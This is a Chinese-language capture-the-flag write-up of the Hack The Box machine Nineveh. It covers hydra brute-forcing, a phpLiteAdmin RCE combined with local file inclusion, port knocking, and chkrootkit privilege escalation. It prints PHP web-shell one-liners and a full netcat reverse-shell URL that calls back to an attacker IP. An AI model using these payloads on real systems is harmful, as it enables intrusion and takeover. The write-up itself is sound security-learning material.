zoukankan      html  css  js  c++  java
  • HTB-靶机-Nineveh

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.43

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令

    autorecon 10.10.10.43 -o ./nineveh-autorecon

    最终的扫描结果

    gobuster dir -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -o bmfx-nineveh.gobusters -t 100

    gobuster dir -u https://nineveh.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o bmfxhttps-nineveh.gobusters -k -t 100

    根据上面扫出来的目录,都访问看看,得到如下

    顺手看你了下网页源代码

    得知用户名可能就是admin,密码就爆破下

    hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"

    使用hydra进行爆破,得出密码

    登录进去之后点击了每个功能点看到一个可疑的请求

    猜测可能存在LFI,这里刚开始测试有点问题,最后才知道代码里面写了需要关键字才可执行

    有文件包含就得有其他途径配合,上面扫描的结果中80端口已经探测的差不多了,看看443端口,有两个地址,一个是db另一个是secure_notes ,先访问db看看

    是个phpLiteAdmin 1.9搜索下有没有漏洞可以利用

    还真有,目标就写的1.9版本,拿八九不离十就可以利用看看,先用那个方便的远程代码执行漏洞

    大概意思就是新建一个后缀为php的数据库然后里面新建一个字段带上php小马就可以了,但目前的问题是需要认证,没有登录密码,需要先破解密码,我这里还是使用hydra进行破解

    hydra 10.10.10.43 -l user -P /usr/share/seclists/Passwords/Leaked-Databases/phpbb.txt https-post-form "/db/index.php:password=^PASS^&proc_login=true:Incorrect password"

    这里需要注意一下,因为破解的目标不需要输入用户名,所以这里使用hydra进行破解可以随便指定一个用户就可以,密码是需要指定靠谱的字典进行爆破

    得到密码登录上去,按照上面提到的exploit方式进行操作

    这里需要注意的是,利用本靶机的LFI需要带关键字ninevehNotes,否则不能正常执行,我这就搞了有点时间,后来导致这类原因是我成功拿到目标权限查看代码得知,这里也看经验,有经验的话可能一下就猜出来是这样,没有的话,就看前面的信息搜集,搜集好的话有提示也能搞出来,所以php的代码执行时下面的一种都可以,当然其他形式只要能执行都可以

    <?php echo system($_GET["bmfx"]); ?>
    <?php echo system($_REQUEST["bmfx"]); ?>

    成功之后就是这样

    到这里没啥问题就可以直接反弹shell了

    http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&bmfx=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.5+8833+>/tmp/f

    反弹的命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.5+8833+>/tmp/f

    访问上面的连接即可成功反弹shell

    到用户的家目录翻看user.txt发现没有权限,看来是要横向提权到普通用户amrois ,这里卡了一会,回头看上面收集的信息,发现还有扫描出来的目录没看呢,访问看看

    复制上面图片地址,使用wget下载下来看看

    图片的话要看看地理位置信息,要看看隐写信息,要么就看看关键字符,这里使用strings查看下

    发现用户amrois的私钥,直接拿到本地来连接登录,连接不上, 想起来扫描的时候22端口没开,然后在反弹的shell中执行网络连接命令,确认端口22是开放的,但是外面访问不了,此时如果有经验的话就知道使用了knock服务,需要敲击端口开放22端口

    根据上面得到的敲击信息,直接敲一把

    22端口开了,迅速使用密钥登录目标

    成功拿到user.txt ,使用pspy枚举下当前运行的进程相关信息,下载地址:https://github.com/DominicBreuker/pspy/blob/master/README.md ,得出来目标靶机运行了chkrootkit

    chkrootkit有一个本地提权漏洞,https://www.exploit-db.com/exploits/38775 不管是啥版本,先利用一把试试 ,看了提权代码,最终是要做的就是此程序会以root身份周期性执行/tmp/update的文件,所以我们只需要新建tmp目录下的update文件,里面写入反弹shell代码即可

    这里使用哪个用户都可以成功,我这测试就是www-data用户

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Eclipse 远程调试
    大数据处理方法bloom filter
    sicily 1259 Sum of Consecutive Primes
    sicily 1240. Faulty Odometer
    sicily 1152 简单马周游 深度优先搜索及回溯算法
    sicily 1050 深度优先搜索解题
    sicily 1024 邻接矩阵与深度优先搜索解题
    sicily 1156 二叉树的遍历 前序遍历,递归,集合操作
    sicily 1443 队列基本操作
    sicily 1006 team rankings 枚举解题
  • 原文地址:https://www.cnblogs.com/autopwn/p/13985366.html
Copyright © 2011-2022 走看看